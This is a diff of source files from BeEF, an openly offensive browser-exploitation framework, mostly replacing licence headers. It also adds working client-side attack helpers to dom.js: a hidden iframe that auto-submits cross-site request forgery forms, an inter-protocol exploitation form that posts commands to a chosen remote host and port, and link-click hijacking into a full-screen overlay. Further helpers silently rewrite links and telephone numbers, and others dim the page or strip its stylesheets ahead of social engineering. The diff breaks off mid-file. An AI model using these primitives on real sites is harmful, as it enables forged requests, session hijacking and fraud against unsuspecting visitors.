+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF  
 module Filters
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
@@ -22,7 +12,7 @@ module Filters
  def self.is_valid_pagetitle?(str)
    return false if not str.is_a? String
    return false if has_non_printable_char?(str)
-    return false if str.length > 50      
+    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
    true
  end

--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module HBManager
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.

 # @note Include here all the gems we are using
 require 'rubygems'
@@ -24,6 +15,7 @@ require 'ipaddr'
 require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
+require 'rubydns'

 # @note Include the filters
 require 'core/filters'
@@ -39,10 +31,3 @@ require 'core/settings'

 # @note Include the core of BeEF
 require 'core/core'
-
-# @note Include helpers
-require 'core/module'
-require 'core/modules'
-require 'core/extension'
-require 'core/extensions'
-require 'core/hbmanager'
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,27 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
 */

 $j = jQuery.noConflict();

-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {
@@ -42,15 +31,35 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.
 		 */
 		execute: function(fn) {
-			this.commands.push(fn);
-		},
-		
+            if ( typeof  beef.websocket == "undefined"){
+                 this.commands.push(fn);
+            }else{
+                fn();
+            }
+        },
+
+
+
 		/**
 		 * Registers a component in BeEF JS.
 		 * @params: {String} the component.
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,110 +1,101 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.cookie
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
- * Original author unknown.
- * 
- */
-beef.browser.cookie = {
-	
-		setCookie: function (name, value, expires, path, domain, secure) 
-		{
-	
-			var today = new Date();
-			today.setTime( today.getTime() );
-	
-			if ( expires )
-			{
-				expires = expires * 1000 * 60 * 60 * 24;
-			}
-			var expires_date = new Date( today.getTime() + (expires) );
-	
-			document.cookie = name + "=" +escape( value ) +
-				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
-				( ( path ) ? ";path=" + path : "" ) +
-				( ( domain ) ? ";domain=" + domain : "" ) +
-				( ( secure ) ? ";secure" : "" );
-		},
-
-		getCookie: function(name) 
-		{
-			var a_all_cookies = document.cookie.split( ';' );
-			var a_temp_cookie = '';
-			var cookie_name = '';
-			var cookie_value = '';
-			var b_cookie_found = false;
-			
-			for ( i = 0; i < a_all_cookies.length; i++ )
-			{
-				a_temp_cookie = a_all_cookies[i].split( '=' );
-				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
-				if ( cookie_name == name )
-				{
-					b_cookie_found = true;
-					if ( a_temp_cookie.length > 1 )
-					{
-						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
-					}
-					return cookie_value;
-					break;
-				}
-				a_temp_cookie = null;
-				cookie_name = '';
-			}
-			if ( !b_cookie_found )
-			{
-				return null;
-			}
-		},
-
-		deleteCookie: function (name, path, domain) 
-		{
-			if ( this.getCookie(name) ) document.cookie = name + "=" +
-			( ( path ) ? ";path=" + path : "") +
-			( ( domain ) ? ";domain=" + domain : "" ) +
-			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
-		},
-		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		},
-
-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		}	
-					
-};
-
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.cookie
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
+ * Original author unknown.
+ * 
+ */
+beef.browser.cookie = {
+	
+		setCookie: function (name, value, expires, path, domain, secure) 
+		{
+	
+			var today = new Date();
+			today.setTime( today.getTime() );
+	
+			if ( expires )
+			{
+				expires = expires * 1000 * 60 * 60 * 24;
+			}
+			var expires_date = new Date( today.getTime() + (expires) );
+	
+			document.cookie = name + "=" +escape( value ) +
+				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
+				( ( path ) ? ";path=" + path : "" ) +
+				( ( domain ) ? ";domain=" + domain : "" ) +
+				( ( secure ) ? ";secure" : "" );
+		},
+
+		getCookie: function(name) 
+		{
+			var a_all_cookies = document.cookie.split( ';' );
+			var a_temp_cookie = '';
+			var cookie_name = '';
+			var cookie_value = '';
+			var b_cookie_found = false;
+			
+			for ( i = 0; i < a_all_cookies.length; i++ )
+			{
+				a_temp_cookie = a_all_cookies[i].split( '=' );
+				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
+				if ( cookie_name == name )
+				{
+					b_cookie_found = true;
+					if ( a_temp_cookie.length > 1 )
+					{
+						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
+					}
+					return cookie_value;
+					break;
+				}
+				a_temp_cookie = null;
+				cookie_name = '';
+			}
+			if ( !b_cookie_found )
+			{
+				return null;
+			}
+		},
+
+		deleteCookie: function (name, path, domain) 
+		{
+			if ( this.getCookie(name) ) document.cookie = name + "=" +
+			( ( path ) ? ";path=" + path : "") +
+			( ( domain ) ? ";domain=" + domain : "" ) +
+			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
+		},
+		
+		hasSessionCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', '', '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		},
+
+		hasPersistentCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', 1, '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		}	
+					
+};
+
 beef.regCmp('beef.browser.cookie');
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,39 +1,30 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.popup
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
- * Original author unknown.
- * 
- */
-beef.browser.popup = {
-	
-		blocker_enbabled: function ()
-		{
-			screenParams = beef.browser.getScreenParams();
-			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
-			if (popUp == null || typeof(popUp)=='undefined') {   
-			  	return true;
-			} else {   
-				popUp.close();
-				return false;
-			}
-		}
-};
-
-beef.regCmp('beef.browser.popup');
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.popup
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+ * Original author unknown.
+ * 
+ */
+beef.browser.popup = {
+	
+		blocker_enabled: function ()
+		{
+			screenParams = beef.browser.getScreenSize();
+			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+			if (popUp == null || typeof(popUp)=='undefined') {   
+			  	return true;
+			} else {   
+				popUp.close();
+				return false;
+			}
+		}
+};
+
+beef.regCmp('beef.browser.popup');
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.dom
 *
@@ -85,38 +76,146 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
-     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
-     * example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+     * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
+     * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
+     * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
 	 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
-	 * @param: {String} method: can be 'GET' or 'POST'. defaults to GET
 	 * @param: {Hash} params: list of params that will be sent in request.
 	 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
 	 * @param: {Function} a callback function to fire once the iFrame has loaded
 	 * @return: {Object} the inserted iFrame
+     *
 	 */
-	createIframe: function(type, method, params, styles, onload) {
+	createIframe: function(type, params, styles, onload) {
 		var css = {};
-		var form_submit = (method.toLowerCase() == 'post') ? true : false; 
-		if (form_submit && params['src'])
-		{
-			var form_action = params['src'];
-			params['src'] = '';
+
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
-		if (form_submit && form_action)
-		{
-			var id = beef.dom.generateID();
-			$j(iframe).attr({'id': id, 'name':id});
-			var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
-			$j(form).prependTo('body').submit();
-		}
 		return iframe;
 	},
+
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
     * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -168,6 +267,23 @@ beef.dom = {
 		}).length;
 	},

+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
     * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -194,6 +310,31 @@ beef.dom = {
 		return count;
 	},

+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
    /**
     *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
     * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -232,7 +373,8 @@ beef.dom = {

            if (codebase != null) {
                content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                content += "<param name='archive' value='" + archive + "' />";
            }
            if (params != null) {
@@ -240,7 +382,7 @@ beef.dom = {
            }
            content += "</object>";
        }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {

            if (codebase != null) {
                content = "" +
@@ -259,24 +401,25 @@ beef.dom = {
            }
            content += "</applet>";
        }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
        $j('body').append(content);
    },

@@ -286,10 +429,63 @@ beef.dom = {
     */
    detachApplet: function(id) {
        $j('#' + id + '').detach();
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
+     * @params: {String} action: the form action attribute, where the request will be sent.
+     * @params: {String} method: HTTP method, usually POST.
+     * @params: {String} enctype: form encoding type
+     * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+     *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
+     */
+    createIframeXsrfForm: function(action, method, enctype, inputs){
+        var iframeXsrf = beef.dom.createInvisibleIframe();
+
+        var formXsrf = document.createElement('form');
+        formXsrf.setAttribute('action',  action);
+        formXsrf.setAttribute('method',  method);
+        formXsrf.setAttribute('enctype', enctype);
+
+        var input = null;
+        for (i in inputs){
+            var attributes = inputs[i];
+            input = document.createElement('input');
+                for(key in attributes){
+                    input.setAttribute(key, attributes[key]);
+                }
+            formXsrf.appendChild(input);
+        }
+        iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
+        formXsrf.submit();
+
+        return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, path, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
    }

-
-	
 };

 beef.regCmp('beef.dom');
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662

 beef.encode = {};
@@ -156,6 +147,6 @@ beef.encode.base64 = {
        return string;
    }

-}
+};

 beef.regCmp('beef.encode.base64');
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,26 +1,23 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/

 beef.encode.json = {
 	
 	stringify: function(o) {
-        if (typeof(JSON) == 'object' && JSON.stringify)
-            return JSON.stringify(o);
-        
+        if (typeof(JSON) == 'object' && JSON.stringify) {
+            // Error on stringifying cylcic structures caused polling to die
+            try {
+                s = JSON.stringify(o);    
+            } catch(error) {
+                // TODO log error / handle cyclic structures? 
+            }
+            return s;
+        }
        var type = typeof(o);
    
        if (o === null)
@@ -126,9 +123,9 @@ beef.encode.json = {
        '"' : '\\"',
        '\\': '\\\\'
    }
-}
+};

-$j.toJSON = function(o) {return beef.encode.json.stringify(o);}
-$j.quoteString = function(o) {return beef.encode.json.quoteString(o);}
+$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
+$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};

 beef.regCmp('beef.encode.json');
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
